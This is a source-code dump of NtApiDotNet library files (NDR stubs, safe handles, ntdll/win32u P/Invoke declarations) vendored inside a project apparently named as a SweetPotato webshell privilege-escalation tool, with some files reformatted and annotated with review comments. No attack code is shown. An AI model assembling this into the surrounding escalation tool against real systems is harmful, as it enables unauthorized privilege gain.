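    /// <typeparam name="T">The base type of pipe blocks.</typeparam>
    // The listing showed "NdrPipe where T : struct" with the type parameter list missing,
    // which does not compile; the constraint clause and the T[] signatures require <T>.
    public class NdrPipe<T> where T : struct
    {
        /// <summary>
        /// Pull a block from a pipe.
        /// </summary>
        /// <param name="count">The maximum number of elements to pull.</param>
        /// <returns>The pulled block.</returns>
        /// <exception cref="NotImplementedException">Always thrown; pipe support is not implemented.</exception>
        public T[] Pull(int count)
        {
            throw new NotImplementedException("Pipe support not implemented");
        }

        /// <summary>
        /// Push a block to a pipe.
        /// </summary>
        /// <param name="data">The block to push.</param>
        /// <exception cref="NotImplementedException">Always thrown; pipe support is not implemented.</exception>
        public void Push(T[] data)
        {
            throw new NotImplementedException("Pipe support not implemented");
        }
    }
}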
45 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/Marshal/NdrUnsupported.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Ndr.Marshal
16 | {
17 | /// <summary>
18 | /// Place holder for unsupported types.
19 | /// </summary>
20 | public class NdrUnsupported
21 | {
22 | private NdrUnsupported() // Private and the only constructor shown, so no code outside this class can create an instance.
23 | {
24 | }
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/NdrParserException.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2018 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
17 | namespace NtApiDotNet.Ndr
18 | {
19 | /// <summary>
20 | /// Exception thrown when NDR parsing fails.
21 | /// </summary>
22 | public class NdrParserException : ApplicationException
23 | {
24 | /// <summary>
25 | /// Constructor.
26 | /// </summary>
27 | /// <param name="message">Exception message.</param>
28 | public NdrParserException(string message)
29 | : base(message)
30 | {
31 | }
32 |
33 | /// <summary>
34 | /// Constructor.
35 | /// </summary>
36 | /// <param name="message">Exception message.</param>
37 | /// <param name="inner_exception">Inner exception to wrap.</param>
38 | public NdrParserException(string message, Exception inner_exception)
39 | : base(message, inner_exception)
40 | {
41 | }
42 | }
43 | }
44 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/NdrProtocolSequenceEndpoint.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Utilities.Memory;
16 | using System;
17 |
18 | namespace NtApiDotNet.Ndr
19 | {
20 | /// <summary>
21 | /// Class representing an RPC protocol sequence.
22 | /// </summary>
23 | [Serializable] // Opts the type into .NET runtime serialization; instances should only be deserialized from data the caller trusts.
24 | public class NdrProtocolSequenceEndpoint
25 | {
26 | /// <summary>
27 | /// The protocol sequence for the endpoint.
28 | /// </summary>
29 | public string ProtocolSequence { get; }
30 | /// <summary>
31 | /// The endpoint name.
32 | /// </summary>
33 | public string Endpoint { get; }
34 | // Both strings are read once, through the supplied memory reader, at construction time.
35 | internal NdrProtocolSequenceEndpoint(RPC_PROTSEQ_ENDPOINT protseq, IMemoryReader reader)
36 | {
37 | ProtocolSequence = protseq.GetRpcProtocolSequence(reader);
38 | Endpoint = protseq.GetEndpoint(reader);
39 | }
40 | }
41 | }
42 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/NtAlpcUtils.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
namespace NtApiDotNet
{
    /// <summary>
    /// Extension helpers that turn optional ALPC inputs into safe buffers.
    /// </summary>
    internal static class NtAlpcUtils
    {
        // A null attrs yields the shared Null buffer; otherwise the buffer built from attrs
        // is handed to list.AddResource (presumably so it is disposed together with the list).
        internal static SafeAlpcMessageAttributesBuffer GetAttributesBuffer(this DisposableList list, IMessageAttributes attrs)
        {
            if (attrs != null)
            {
                return list.AddResource(attrs.ToSafeBuffer());
            }
            return SafeAlpcMessageAttributesBuffer.Null;
        }

        // Same pattern for an optional message: Null buffer when absent, tracked buffer otherwise.
        internal static SafeAlpcPortMessageBuffer GetMessageBuffer(this DisposableList list, AlpcMessage message)
        {
            if (message != null)
            {
                return list.AddResource(message.ToSafeBuffer());
            }
            return SafeAlpcPortMessageBuffer.Null;
        }
    }
}
37 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/NtApiDotNet.Core.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | NtApiDotNet
5 | netstandard2.0
6 | NtApiDotNet
7 | James Forshaw
8 | Google Inc.
9 | NtApiDotNet
10 | 1.1.27.0
11 | Copyright © Google Inc. 2016-2020
12 | 1.0.0.0
13 | https://www.apache.org/licenses/LICENSE-2.0
14 | https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/NtApiDotNet.nuspec:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $id$
5 | $version$
6 | NtApiDotNet
7 | James Forshaw
8 | James Forshaw
9 | Apache-2.0
10 | https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools
11 | false
12 | A .NET class library to access native NT API system calls
13 |
14 | 1.1.27
15 | --------
16 | * Added support for directory change notifications.
17 | * Added New-NtDesktop, Get-NtDesktop and Get-NtDesktopName.
18 | * Added New-NtWindowStation, Get-NtWindowStation and Get-NtWindowStationName.
19 | * Changed Win32 error codes to an enumeration.
20 | * Added Load/Unload driver.
21 | * Added properties to NtType to show access masks.
22 | * Added basic SendInput method.
23 | * Added token source tab to Token Viewer.
24 | * Updated for the Job object and New-NtJob.
25 | * Added NtWindow class a HWND enumeration.
26 | * Added Get-AccessibleWindowStation command.
27 | * Added some well known WNF names.
28 | * Added option to Get-AccessibleService to check file permissions.
29 | * Added Set-NtProcessJob command.
30 | * Added Get-AccessibleToken command.
31 | * Added support for compound ACEs.
32 | * Added Get/Sid-NtTokenSid and Get/Set-NtTokenGroup.
33 | * Added Get-AccessibleEventTrace command.
34 | * Added Get-AccessibleWnf command.
35 |
36 | Copyright Google Inc. 2016-2020
37 | syscalls
38 |
39 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/NtEtwRegistration.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet
16 | {
17 | /// <summary>
18 | /// Class to represent an NT trace GUID.
19 | /// </summary>
20 | [NtType("EtwRegistration")]
21 | public class NtEtwRegistration : NtObjectWithDuplicate // NOTE(review): the base type appears here without type arguments; they may have been lost when this listing was extracted, so confirm against the original file.
22 | {
23 | #region Constructors
24 | internal sealed class NtTypeFactoryImpl : NtTypeFactoryImplBase
25 | {
26 | public NtTypeFactoryImpl() : base(false) // The meaning of the 'false' argument is defined by NtTypeFactoryImplBase, which is not shown here.
27 | {
28 | }
29 | }
30 |
31 | internal NtEtwRegistration(SafeKernelObjectHandle handle) : base(handle) // Wraps an existing kernel handle; internal, so only code in this assembly can construct one.
32 | {
33 | }
34 | #endregion
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/NtRtl.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 |
17 | namespace NtApiDotNet
18 | {
19 | #pragma warning disable 1591
20 | public static partial class NtRtl
21 | { // Warning 1591 (missing XML documentation on a public member) is suppressed around these raw imports.
22 | [DllImport("ntdll.dll")]
23 | public static extern int RtlNtStatusToDosError(NtStatus status); // Maps an NTSTATUS code to the corresponding Win32 error code.
24 | // NOTE(review): the NoTeb variant is understood to perform the same mapping without recording the status in the calling thread's TEB; confirm against the native documentation.
25 | [DllImport("ntdll.dll")]
26 | public static extern int RtlNtStatusToDosErrorNoTeb(NtStatus status);
27 | }
28 | #pragma warning restore 1591
29 | }
30 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/NtStructures.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
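namespace NtApiDotNet
{
#pragma warning disable 1591
    /// <summary>
    /// Reference-type 64-bit integer with overlapping LowPart/HighPart/QuadPart views.
    /// Being a class, it can be passed as null where a native call takes an optional pointer.
    /// </summary>
    [StructLayout(LayoutKind.Explicit)]
    public class LargeInteger
    {
        // LowPart and HighPart alias the two halves of QuadPart (offsets 0 and 4).
        [FieldOffset(0)]
        public uint LowPart;
        [FieldOffset(4)]
        public int HighPart;
        [FieldOffset(0)]
        public long QuadPart;

        public LargeInteger()
        {
        }

        public LargeInteger(long value)
        {
            QuadPart = value;
        }

        /// <summary>
        /// Interprets QuadPart as a Windows file time.
        /// </summary>
        /// <returns>
        /// The local DateTime, or DateTime.MinValue when the value is outside the range
        /// DateTime.FromFileTime accepts.
        /// </returns>
        internal DateTime ToDateTime()
        {
            // Kept in step with LargeIntegerStruct.ToDateTime: an out-of-range value
            // (for example a sentinel such as long.MaxValue) maps to MinValue instead of throwing.
            try
            {
                return DateTime.FromFileTime(QuadPart);
            }
            catch (ArgumentException)
            {
                return DateTime.MinValue;
            }
        }
    }

    /// <summary>
    /// Value-type counterpart of LargeInteger with the same overlapping field layout.
    /// </summary>
    [StructLayout(LayoutKind.Explicit)]
    public struct LargeIntegerStruct
    {
        [FieldOffset(0)]
        public uint LowPart;
        [FieldOffset(4)]
        public int HighPart;
        [FieldOffset(0)]
        public long QuadPart;

        /// <summary>
        /// Interprets QuadPart as a Windows file time.
        /// </summary>
        /// <returns>The local DateTime, or DateTime.MinValue when the value is out of range.</returns>
        internal DateTime ToDateTime()
        {
            try
            {
                return DateTime.FromFileTime(QuadPart);
            }
            catch (ArgumentException)
            {
                return DateTime.MinValue;
            }
        }
    }
#pragma warning restore 1591
}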
70 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/NtWaitNative.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet
19 | {
20 | #pragma warning disable 1591
// Selects how NtWaitForMultipleObjects treats its handle array. The members carry the
// implicit values 0 and 1 and are passed straight to native code, so their order is part
// of the native contract and must not be changed.
public enum WaitType
{
    WaitAll,
    WaitAny
}
26 |
// Raw P/Invoke declarations for the ntdll wait calls. Each returns the NtStatus of the
// call unchanged; nothing in these declarations checks or converts it, so callers must.
// Timeout is the LargeInteger class (a reference type) and is therefore passed by pointer.
// NOTE(review): presumably a null Timeout means "wait without a timeout" - confirm
// against the callers before relying on it.
public static partial class NtSystemCalls
{
    // Wait on a single kernel object handle.
    [DllImport("ntdll.dll")]
    public static extern NtStatus NtWaitForSingleObject(
        SafeKernelObjectHandle Handle,
        bool Alertable,
        LargeInteger Timeout
    );

    // Wait on several handles at once. Handles is an array of raw handle values, so the
    // caller has to keep the owning safe handles alive for the duration of the call, and
    // HandleCount is not checked against Handles.Length by this declaration.
    [DllImport("ntdll.dll")]
    public static extern NtStatus NtWaitForMultipleObjects(int HandleCount,
        IntPtr[] Handles, WaitType WaitType, bool Alertable, LargeInteger Timeout);

    // Signal one object and wait on another in a single call.
    [DllImport("ntdll.dll")]
    public static extern NtStatus NtSignalAndWaitForSingleObject(
        SafeKernelObjectHandle ObjectToSignal,
        SafeKernelObjectHandle WaitableObject,
        bool Alertable,
        LargeInteger Timeout);
}
47 | #pragma warning disable 1591
48 | }
49 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/NtWindowNative.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet
19 | {
20 | #pragma warning disable 1591
21 |
// Information class passed as the second argument of NtUserQueryWindow. The numeric
// values go to native code as-is; 3 and 4 are not defined by this enum.
public enum QueryWindowType
{
    ProcessId = 0,
    Owner = 1,
    ThreadId = 2,
    Hung = 5,
}
29 |
// Raw P/Invoke declarations for window-manager calls exported by win32u.dll.
public static partial class NtSystemCalls
{
    // Fill Buffer with window handles. BufferCount is supplied by the caller and is not
    // checked against Buffer.Length here, so the two must agree; RequiredCount receives
    // the count reported by the call.
    [DllImport("win32u.dll")]
    public static extern NtStatus NtUserBuildHwndList(SafeKernelObjectHandle Desktop, IntPtr ParentWindow,
        [MarshalAs(UnmanagedType.Bool)] bool EnumerateChildren, bool HideImmersiveWindows, int ThreadId, int BufferCount,
        [Out, MarshalAs(UnmanagedType.LPArray)] IntPtr[] Buffer, out int RequiredCount);

    // Query one property of a window, selected by QueryWindowType. Returns a plain int,
    // not an NtStatus; SetLastError = true makes the Win32 last error available afterwards.
    [DllImport("win32u.dll", SetLastError = true)]
    public static extern int NtUserQueryWindow(IntPtr Window, QueryWindowType query);

    // Read a window's class name into a caller-allocated UnicodeStringAllocated.
    // Returns a plain int with the last error preserved, as above.
    [DllImport("win32u.dll", SetLastError = true)]
    public static extern int NtUserGetClassName(IntPtr Window, [MarshalAs(UnmanagedType.Bool)] bool RealName, UnicodeStringAllocated Name);
}
43 |
44 | #pragma warning restore
45 | }
46 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.InteropServices;
3 |
4 | // General Information about an assembly is controlled through the following
5 | // set of attributes. Change these attribute values to modify the information
6 | // associated with an assembly.
7 | [assembly: AssemblyTitle("NtApiDotNet")]
8 | [assembly: AssemblyDescription("")]
9 | [assembly: AssemblyConfiguration("")]
10 | [assembly: AssemblyCompany("Google Inc.")]
11 | [assembly: AssemblyProduct("NtApiDotNet")]
12 | [assembly: AssemblyCopyright("Copyright © Google Inc. 2016-2020")]
13 | [assembly: AssemblyTrademark("")]
14 | [assembly: AssemblyCulture("")]
15 |
16 | // Setting ComVisible to false makes the types in this assembly not visible
17 | // to COM components. If you need to access a type in this assembly from
18 | // COM, set the ComVisible attribute to true on that type.
19 | [assembly: ComVisible(false)]
20 |
21 | // The following GUID is for the ID of the typelib if this project is exposed to COM
22 | [assembly: Guid("6aeb5004-6093-4c23-aeae-911d64cacc58")]
23 |
24 | // Version information for an assembly consists of the following four values:
25 | //
26 | // Major Version
27 | // Minor Version
28 | // Build Number
29 | // Revision
30 | //
31 | // You can specify all the values or you can default the Build and Revision Numbers
32 | // by using the '*' as shown below:
33 | // [assembly: AssemblyVersion("1.0.*")]
// AssemblyVersion is pinned at 1.0.0.0, so it does not identify the release. The file and
// informational versions below (1.1.27) are the values to use when identifying which
// build of this vendored library is present.
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.1.27.0")]
[assembly: AssemblyInformationalVersion("1.1.27")]
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Readme.txt:
--------------------------------------------------------------------------------
1 | NtApiDotNet - Managed .NET library for accessing NT API
2 |
3 | (c) Google Inc. 2015, 2016, 2017, 2018, 2019
4 | Developed by James Forshaw
5 |
6 | This library is written entirely in C# to allow managed applications easy access to
7 | various native NT API routines. It's used as the core of the sandbox analysis tools
8 | as well as a Powershell Module. The purpose of this library is to make it easier to
9 | call into the NT API, handling things like variable length structures and lifetime
10 | management.
11 |
12 | The majority of the exposed classes and methods have XML documentation, which can
13 | be used for intellisense or converted into real documentation. Most of the low-level
14 | APIs are not documented however, see the code for usage examples.
15 |
16 | In addition to my own reverse engineering efforts and MSDN documentation the following
17 | people or resources have proven invaluable in determining API functionality.
18 |
19 | Process Hacker Sources: http://processhacker.sourceforge.net/
20 | Windows NT/2000 Native API Reference: Gary Nebbett (ISBN 9781578701995)
21 | Alex Ionescu
22 | ALPC RPC client code inspired by work by Clement Rouault (@hakril) and Thomas Imbert
23 | (@masthoon) at PacSec (https://pacsec.jp/psj17/PSJ2017_Rouault_Imbert_alpc_rpc_pacsec.pdf)
24 | And others I've no doubt forgotten.
25 |
26 | NOTE: It's still a work in progress and it's not designed to act as a documentation
27 | source for the entire NT API. There will be bits missing. Patches are welcome to
28 | add missing functions or fix bugs, see the CONTRIBUTING file in the root of the solution.
29 |
30 | Building for PowerShell Core 6.0/.NET Core 2.0
31 | -----------------------------------------
32 |
33 | In order to build for PowerShell Core 6.0 use the command line:
34 |
35 | dotnet build NtApiDotNet\NtApiDotNet.Core.csproj -c Release
36 |
37 | Building for .NET Core does not currently work in Visual Studio 2017.
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/SafeAlpcPortSectionHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using Microsoft.Win32.SafeHandles;
16 | using System;
17 |
18 | namespace NtApiDotNet
19 | {
/// <summary>
/// Safe handle for a port section.
/// </summary>
/// <remarks>
/// The section handle can only be deleted through the ALPC port it belongs to, so the
/// port is kept alongside the handle.
/// </remarks>
public class SafeAlpcPortSectionHandle : SafeHandleZeroOrMinusOneIsInvalid
{
    internal SafeAlpcPortSectionHandle(AlpcHandle handle, bool owns_handle, NtAlpc port) : base(owns_handle)
    {
        IntPtr raw_value = new IntPtr(handle.Value);
        SetHandle(raw_value);
        Port = port;
    }

    // Port that owns the section; read again when the handle is released.
    internal NtAlpc Port { get; }

    /// <summary>
    /// Release handle.
    /// </summary>
    /// <returns>True if handle released successfully.</returns>
    protected override bool ReleaseHandle()
    {
        // Without an open port the section cannot be deleted; report failure.
        bool port_usable = Port != null && !Port.Handle.IsClosed;
        if (!port_usable)
        {
            return false;
        }

        var status = NtSystemCalls.NtAlpcDeletePortSection(Port.Handle,
            AlpcDeletePortSectionFlags.None, handle.ToInt64());
        return status.IsSuccess();
    }
}
47 | }
48 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/SafeHandleListHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Collections.Generic;
17 | using System.Linq;
18 | using System.Runtime.InteropServices;
19 |
20 | namespace NtApiDotNet
21 | {
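/// <summary>
/// Native buffer holding an array of raw handle values, one pointer-sized slot per handle.
/// The owning safe handles are kept in a list and disposed when the buffer is released.
/// </summary>
// NOTE(review): the generic type arguments were missing from the listing this was taken
// from. They are restored here from how the values are used (DangerousGetHandle on the
// elements, h.Handle on NtObject) - confirm against the original file.
internal sealed class SafeHandleListHandle : SafeHGlobalBuffer
{
    private DisposableList<SafeKernelObjectHandle> _handles;

    /// <summary>
    /// Take ownership of the handles and write their raw values into the buffer.
    /// </summary>
    /// <param name="handles">Handles to store; enumerated exactly once.</param>
    public SafeHandleListHandle(IEnumerable<SafeKernelObjectHandle> handles)
        : this(handles.ToDisposableList())
    {
        // The sequence is materialised before the buffer is sized. The previous form
        // called Count() and then ToDisposableList(), which runs a lazy sequence twice;
        // with CreateAndDuplicate that meant every handle was duplicated twice and the
        // first set was left for the finalizer to close.
    }

    private SafeHandleListHandle(DisposableList<SafeKernelObjectHandle> handles)
        : base(IntPtr.Size * handles.Count)
    {
        _handles = handles;
        for (int i = 0; i < _handles.Count; ++i)
        {
            // Slot i lives at byte offset i * pointer size from the start of the buffer.
            Marshal.WriteIntPtr(handle, i * IntPtr.Size, _handles[i].DangerousGetHandle());
        }
    }

    /// <summary>
    /// Duplicate each handle and build a buffer that owns the duplicates.
    /// </summary>
    /// <param name="handles">Handles to duplicate; the originals are not taken over.</param>
    /// <returns>The buffer holding the duplicated handle values.</returns>
    public static SafeHandleListHandle CreateAndDuplicate(IEnumerable<SafeKernelObjectHandle> handles)
    {
        return new SafeHandleListHandle(handles.Select(h => NtObject.DuplicateHandle(h)));
    }

    /// <summary>
    /// Duplicate the handle of each object and build a buffer that owns the duplicates.
    /// </summary>
    /// <param name="handles">Objects whose handles are duplicated.</param>
    /// <returns>The buffer holding the duplicated handle values.</returns>
    public static SafeHandleListHandle CreateAndDuplicate(IEnumerable<NtObject> handles)
    {
        return CreateAndDuplicate(handles.Select(h => h.Handle));
    }

    /// <summary>
    /// Dispose the owned handles, then free the native buffer.
    /// </summary>
    /// <returns>The result of the base release.</returns>
    protected override bool ReleaseHandle()
    {
        if (_handles != null)
        {
            _handles.Dispose();
        }
        return base.ReleaseHandle();
    }
}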
53 | }
54 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/SafeIoStatusBuffer.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
17 | namespace NtApiDotNet
18 | {
/// <summary>
/// Non-generic buffer to hold an IO_STATUS_BLOCK.
/// </summary>
// NOTE(review): the base type appears without a type argument in this listing; it was
// probably dropped during extraction - confirm against the original file.
public sealed class SafeIoStatusBuffer : SafeStructureInOutBuffer
{
    // Used only by Null: wraps IntPtr.Zero with the given length and does not own it.
    private SafeIoStatusBuffer(int dummy_length) : base(IntPtr.Zero, dummy_length, false)
    {
    }

    /// <summary>
    /// Constructor.
    /// </summary>
    public SafeIoStatusBuffer()
    {
    }

    /// <summary>
    /// Get a buffer which represents NULL.
    /// </summary>
    // Every read of this property creates a new instance.
    new public static SafeIoStatusBuffer Null { get { return new SafeIoStatusBuffer(0); } }
}
40 | }
41 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/SafeSidBufferHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using Microsoft.Win32.SafeHandles;
16 | using System;
17 |
18 | namespace NtApiDotNet
19 | {
20 | #pragma warning disable 1591
/// <summary>
/// Safe SID buffer.
/// </summary>
/// <remarks>This is used to return values from the RTL apis which need to be freed using RtlFreeSid</remarks>
public sealed class SafeSidBufferHandle : SafeHandleZeroOrMinusOneIsInvalid
{
    // Wrap an existing SID pointer; owns_handle decides whether release frees it.
    public SafeSidBufferHandle(IntPtr sid, bool owns_handle) : base(owns_handle)
    {
        SetHandle(sid);
    }

    // Empty, owning handle for native code to fill in.
    public SafeSidBufferHandle() : base(true)
    {
    }

    // A non-owning handle around IntPtr.Zero; a new instance on every read.
    public static SafeSidBufferHandle Null
    {
        get
        {
            return new SafeSidBufferHandle(IntPtr.Zero, false);
        }
    }

    // Length as reported by RtlLengthSid. The handle is passed as-is, with no validity
    // check, so this must only be read on a handle that holds a SID.
    public int Length
    {
        get
        {
            return NtRtl.RtlLengthSid(handle);
        }
    }

    // Build a managed Sid from the native pointer.
    public Sid ToSid()
    {
        IntPtr sid_pointer = DangerousGetHandle();
        return new Sid(sid_pointer);
    }

    // Free the SID with RtlFreeSid when there is one; always reports success.
    protected override bool ReleaseHandle()
    {
        if (IsInvalid)
        {
            return true;
        }

        NtRtl.RtlFreeSid(handle);
        handle = IntPtr.Zero;
        return true;
    }
}
60 |
61 | #pragma warning restore 1591
62 | }
63 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/SafeStringBuffer.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
